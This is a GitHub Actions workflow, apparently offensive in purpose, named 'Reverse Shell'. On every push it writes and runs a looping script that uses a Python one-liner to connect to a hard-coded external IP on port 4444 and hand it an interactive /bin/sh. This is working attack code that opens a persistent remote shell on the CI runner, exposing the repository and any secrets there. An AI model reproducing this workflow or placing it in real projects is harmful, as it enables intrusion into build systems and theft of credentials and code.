name: Reverse Shell

on: [push]

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'

    - name: Create reverse shell script
      run: |
        cat << 'EOF' > reverse_shell.sh
        while true; do
            export RHOST="185.159.128.111"
            export RPORT=4444
            python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
            sleep 10
        done
        EOF
        chmod +x reverse_shell.sh

    - name: Run reverse shell script
      run: ./reverse_shell.sh
